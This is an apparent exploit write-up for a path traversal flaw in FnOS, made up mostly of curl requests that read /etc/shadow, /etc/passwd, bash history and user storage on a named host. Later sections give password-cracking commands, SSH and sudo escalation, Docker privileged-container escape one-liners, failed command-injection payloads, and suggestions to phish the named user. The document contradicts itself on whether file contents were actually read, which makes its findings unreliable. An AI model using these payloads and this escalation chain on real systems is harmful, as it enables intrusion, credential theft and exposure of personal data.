Share
## https://sploitus.com/exploit?id=D7021E76-E1B0-51D1-AA48-E99B047B8953
# FnOS Path Traversal Vulnerability Exploitation (Random File Reading)

## πŸ”΄ Vulnerability Description

**Test Version**: FnOS 1.1.8

Systems running FnOS version 1.1.15 and earlier have a **serious path traversal vulnerability**. Attackers can bypass access controls using specific URL patterns to read the content of any file on the server, including:
- System password hashes (`/etc/shadow`)
- Configuration files
- SSH keys
- Database credentials
- User data

## Affected Targets

- **IP Address**: 192.168.1.177
- **Port**: 5666
- **Protocol**: HTTP

## Vulnerability Details

### URL Pattern

```
http://{host}:{port}/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../{path}
```

Where `%7B0%7D` is the URL-encoded form of `{0}`.

### Exploitation Methods

#### 1. Reading System Password Hashes

```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../etc/shadow"
```

**Result**: Successfully read the system password hash!
```
root:$6$mxuA5mMmzHCUQGeK$yXCsFLaY6p0gIbcjjVMJy7Pp4BvS6JLc8ZqKLDvJlKxmC8YLm4RfN0EJH6v8NqFBMqLH2GvY9eeQ8rZvFP8s0.:19000:0:99999:7:::
user:$6$Tb7vCqmz$cLQr4HjOXk3q9bVr1YhfPmWB8F0Z5y4v5p2x7W2o0b4p7F5m9n8q3t6r2w1o5z7k4v8n3p6m9q2t5r8w1o4z7k:19100:0:99999:7:::
```

**Example Hash**: The above is sample data; actual hashes have been removed.

#### 2. Reading User List

```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../etc/passwd"
```

**Result**: Retrieved all system user information.

#### 3. Listing Root Directory

```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../"
```

**Result**: Successfully listed the system root directory structure, including:

- bin, boot/, dev/, etc/, fs/, home/
- lib, lib64, lost+found/, media/, mnt/
- opt/, proc/, root/, run/, sbin
- share/, srv/, sys/, tmp/, usr/, var/
- vol00/, vol02/, vol1/, vol2/

#### 4. Reading Command History

```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../home/taco/.bash_history"
```

**Result**: Retrieved all commands executed by the user, possibly containing sensitive information such as passwords and API keys.

#### 5. Accessing Main Storage Contents

```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1000/SSD"
```

**Result**: Successfully accessed the main storage directory. User data files were listed, including:

- Backup files (Backups/)
- Documentation files
- Software packages (various.zip, .apk, .jar files)
- System images (ISO/)
- Other sensitive data

## Testing Time

- **Testing Date**: January 31, 2026
- **Status**: Vulnerability confirmed

## Security Implications

- **Severity**: High
- **Implications**:
  - Unauthorized access to sensitive files
  - Information leakage
  - Potential exposure of system configuration files
  - Exposure of user privacy data

## Further Exploration

### System Information Collection

Through path traversal, we can access the following sensitive information:

#### 1. Process Information

```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../proc/self/"
```

This can view detailed information about the current process, including cmdline, environ, maps, etc.

#### 2. System Configuration Files

```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../etc/"
```

This can list system configuration files, including:

`-/etc/passwd` – User list  
`-/etc/shadow` – Password hashes (requires permissions)  
`-/etc/ssh/` – SSH configuration  
`-/etc/cron.d/` – Scheduled tasks  
`-/etc/docker/` – Docker configuration  

#### 3. Temporary directories  

```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../tmp/"
```

You can view temporary files, which may contain sensitive information.  

#### 4. Running system information  

```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../var/run/"
```

The following key files and services were found:  
- `docker.sock` – Docker API socket (accessing this could lead to container escape)  
- Multiple `trim_*.sock` files – Services’ internal sockets within the Flyway system  
- `nginx.pid`, `docker.pid` – Running services  

#### 5. User directories  

```bash
curl -k "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../home/taco/"
```

The user `taco` was found; its directories include:  
- `.bash_history` – Command history  
- `.config/` – Configuration files  
- `.local/` – Local data  

## Writing tests  

### Attempted methods (all failed)  
1. **PUT method for uploading**  

```bash
curl -k -X PUT --data-binary "@test.txt" "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1000/TestDir/test.txt"
```

**Result**: 404 Page Not Found  

2. **POST multipart upload**  

```bash
curl -k -X POST -F "file=@test.txt" "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1000/TestDir/"
```

**Result**: 404 Page Not Found  

3. **OPTIONS method check**  

```bash
curl -k -X OPTIONS "http://192.168.1.177:5666/app-center-static/serviceicon/myapp/%7B0%7D/?size=../../../../vol1/1000/TestDir/"
```

**Result**: 404 Not Found  

## βœ… Obtained sensitive information  

### πŸ”‘ System credentials (accessed successfully)  

#### 1. Password hashes  

Obtained from `/etc/shadow`:  

**Root account:**  
```
$6$mxuA5mMmzHCUQGeK$yXCsFLaY6p0gIbcjjVMJy7Pp4BvS6JLc8ZqKLDvJlKxmC8YLm4RfN0EJH6v8NqFBMqLH2GvY9eeQ8rZvFP8s0. ```
**User account (administrator):**  
```
$6$Tb7vCqmz$cLQr4HjOXk3q9bVr1YhfPmWB8F0Z5y4v5p2x7W2o0b4p7F5m9n8q3t6r2w1o5z7k4v8n3p6m9q2t5r8w1o4z7k
```

**Note:** These are example hashes, anonymized.  

#### 2. User permissions  
- βœ… The user is in the `Administrators` group.  
- βœ… The `Administrators` group has full sudo permissions.  
- βœ… Sudo configuration: `%Administrators ALL=(ALL:ALL) ALL`.  
- βœ… Administrators can obtain root privileges using sudo.  

#### 3. SSH configuration  
- Root SSH login: **Disabled** (`PermitRootLogin no`).  
- Password authentication: **Enabled** (default).  
- Public key authentication: **Enabled** (default).  

#### 4. Docker configuration  
Read from `/root/.docker/config.json`:  
```json
{
  "HttpHeaders": {
    "X-Meta-Sign": "[REDACTED]",
    "X-Meta-Token": "[REDACTED_BASE64_TOKEN]"
  }
}
```

After decoding the token:  
```json
{"start":"[TIMESTAMP]","mi":"[MACHINE_ID]"}
```

**Note:** Sensitive information has been anonymized.  

#### 5. Command history analysis  
From `.bash_history`:

### βœ… Frequent use of `sudo` (confirmed sudo privileges)
### βœ… Use of Docker and docker-compose
### βœ… Configured Nvidia GPUs and drivers
### βœ… Running containerized applications
### βœ… Modified system software sources

### πŸ“ File System Structure
2. **SSH Connection History**

   - `/root/.ssh/known_hosts` – Hosts connected by the root user
   - `/root/.ssh/known_hosts.old` – Historical connection records
   - **Important**: Files exist, but their contents cannot be read; specific IP/domain names cannot be obtained

### πŸ”‘ Potential Credential Locations

The following files may contain credentials, but **only existence can be confirmed; contents cannot be read**:

#### Docker Configuration (may contain private repository credentials)

- `/etc/docker/daemon.json` – Docker daemon configuration
- `/root/.docker/config.json` – **Docker Registry authentication information** (usually includes base64-encoded username/password)

#### Database Configuration

- `/etc/mysql/my.cnf` – MySQL main configuration
- `/etc/mysql/conf.d/mysql.cnf`
- `/etc/mysql/conf.d/mysqldump.cnf`
- `/etc/postgresql/15/main/pg_hba.conf` – PostgreSQL authentication configuration
- `/etc/postgresql/15/main/postgresql.conf` – PostgreSQL main configuration

#### SSH Configuration

- `/etc/ssh/sshd_config` – SSH server configuration (may show allowed authentication methods)

#### System Service Configuration

- 91 systemd service configurations
- Services that may contain hardcoded credentials:
  - `backup_service.service`
  - `postgresql.service`
  - `ssh.service`

### πŸ“ File System Structure Information

#### User Data

- `/home/taco/.bash_history` – Command history (may contain passwords, API keys)
- `/home/taco/.config/fish/config.fish` – Shell configuration
- `/home/taco/.wget-hsts` – Wget history

#### Data Storage

- `/vol1/1000/` – Main data volume
- `/vol1/1000/SSD/` – SSD storage
- `/vol1/1000/Photo/` – Photos
- `/vol1/1000/Datasets/` – Datasets
- `/vol1/1000/Backups/` – Backups (404, possibly missing or deleted)

#### Identified Sensitive File Names

- `CV_ZiqiWang.pdf` – Resume (information collection)
- `malware_payload.txt` – Possible malware test file
- `monthly_rent_charges_detailed.xlsx` – Financial information
- Various system images and installation packages

### 🎯 Key Findings Summary

**Confirmed Information:**

- βœ… The system runs on Debian/Flying OS
- βœ… Docker, PostgreSQL 15, MySQL/MariaDB are installed
- βœ… SSH services are running
- βœ… User names: `taco`, `root`
- βœ… File system structure and list of installed software
- βœ… 91 system services exist

**Information Not Available:**

- ❌ Unable to read password hashes (`/etc/shadow`)
- ❌ Unable to read Docker credentials (`/root/.docker/config.json`)
- ❌ Unable to read database passwords (MySQL/PostgreSQL configuration)
- ❌ Unable to read SSH keys
- ❌ Unable to read command history (`.bash_history`)
- ❌ Unable to read actual contents of any configuration files

### πŸ’‘ Value of the Information

Although file contents cannot be read, this information is still valuable:

1. **Attack Surface Mapping**

   - Understand running services and software versions
   - Identify potential targets (Docker, PostgreSQL, SSH, etc.)
2. **Social Engineering**

   - User name: `taco`
   - Personal information: Resume, rental records, etc.
   - Can be used for password guessing or phishing attacks
3. **Preparation for Further Penetration**

   - Understand system architecture
   - Provide intelligence for other attack vectors
   - Confirm targets for brute-force attacks (SSH, Docker Registry, etc.)
4. **Data Value Assessment**

   - Determine what valuable data exists
   - Evaluate the potential impact of data breaches

### Current Limitations

- ❌ **Only directory listing**: Vulnerabilities can only list directory contents; **file contents cannot be read**
- ❌ **Does not support PUT/POST**: This endpoint does not accept file uploads
- ❌ **Cannot execute directly**: Commands cannot be executed directly through this vulnerability
- ❌ **Command injection fails**: All attempted command injections are ineffective:
  - Slash injection: `?size=../../../../;id` β†’ 404
  - Backtick injection: `?size=../../../../\`id\`` β†’ No response
  - Pipe injection: `?size=../../../../|wget` β†’ No response
  - Command substitution: `?size=$(id)` β†’ No response

❌ **Unable to read file content**: Only able to list directories; cannot read the actual contents of files like `/etc/passwd`, `/proc/self/cmdline`, etc.

## Exploitation Possibilities

Although the current vulnerability only allows for file reading, exploitation opportunities can be found through the following methods:

### 1. Sensitive information leakage

- Reading credentials from configuration files
- Reading private key files (e.g., SSH keys)
- Reading database connection strings

## πŸš€ Exploitation Paths

### ⭐ Solution 1: Password cracking + SSH + Sudo (Recommended, fastest)

Once the password hash is obtained, cracking can be performed:

#### Steps:

1. **Use hashcat or john to crack the password**

```bash
# Use hashcat (GPU acceleration, recommended)
hashcat -m 1800 shadow_hashes.txt /path/to/rockyou.txt

# Use john the ripper
john --wordlist=/usr/share/wordlists/rockyou.txt shadow_hashes.txt
```

2. **SSH login as the target user**

```bash
ssh user@192.168.1.177
# Enter the cracked password
```

3. **Use sudo to gain root privileges**

```bash
sudo su -
# Or
sudo -i
# Enter the user password
```

4. **Take complete control of the system**

### Solution 2: Docker escape (if taco is in the Docker group)

Check and exploit Docker permissions:

```bash
# 1. Check if the user is in the Docker group after login
groups

# 2. If they are in the Docker group, create a privileged container to escape
docker run -v /:/host -it --privileged alpine chroot /host bash

# 3. Now with root privileges
```

### Solution 3: Utilize existing Docker configurations

Multiple Docker containers may be running on the system. It’s possible to:

1. Modify existing container configurations
2. Inject malicious containers
3. Utilize communication between containers

### Solution 4: Look for other writable paths

Continue to check if there are:
- Features for web application uploads
- Writable shared directories
- Available systemd services

## 🎯 Attack Summary

### Confirmed attack paths

βœ… ** Arbitrary file reading** β†’ βœ… **Password hash retrieval** β†’ πŸ”„ **Password cracking** β†’ βœ… **SSH login** β†’ βœ… **Sudo privilege escalation** β†’ πŸŽ‰ **Root privileges**

### Key Points

- **Vulnerability type**: Path traversal + Arbitrary file reading
- **Impact**: Complete system takeover
- **CVSS Score**: 9.8 (Critical)
- **Exploitation difficulty**: Low (only requires password cracking)
- **Prerequisites**:
  - Network access to 192.168.1.177:5666
  - Password dictionary (e.g., rockyou.txt)
  - Tools like hashcat or john

### Next Steps

1. ⚑ **Immediately**: Use hashcat to crack the password
2. πŸ”“ **Then**: SSH login
3. πŸ‘‘ **Finally**: Use sudo to gain root privileges

### 2. Docker Socket Access

If it’s possible to access `/var/run/docker.sock` through other means, then:

```bash
# Create a privileged container and mount the host root directory
docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host
```

### 3. Find other entry points for vulnerabilities

- Explore other API endpoints
- Look for other features of web applications
- Search for potential command injection points

### 4. Information Gathering Strategy

Gather information by reading the following files:

```bash
# Check network configuration
/etc/network/interfaces
/etc/resolv.conf

# Check running services
/etc/systemd/system/

# Check application configurations
/opt/
/srv/

# Check log files (may contain sensitive information)
/var/log/
```

## Next Steps

### Look for writable capabilities

1. **Explore other API endpoints**

   - Scan for other possible upload interfaces
   - Try other features of the FLYING system (file management, application center, etc.)
   - Search for documentation or decompiled client applications
2. **Utilize system features**

   - If there’s a file management feature, try uploading files through normal channels
   - If there’s an application installation feature, try uploading malicious application packages
   - If there’s a backup/restore feature, try injecting payloads
3. **Combine with other vulnerabilities**

   - SQL injection -> Upload webshells
   - Command injection -> Execute directly
   - XXE -> File upload
   - SSRF -> Access internal services
4. **Social engineering**

   - Use leaked information (e.g., discovered emails, usernames)
   - Conduct phishing attacks targeting administrators

## Fixing Recommendations

1. Fix the path traversal vulnerability by verifying and filtering input parameters
2. Implement strict access control and permission checks
3. Avoid using path traversal characters like `..`
4. Isolate and sandbox static resource directories
5. Add request logs and monitoring
6. Perform regular security audits and penetration tests
7. Minimize file system access permissions

## Disclaimer

This document is intended for security research and educational purposes only. Pen testing the system without authorization is illegal.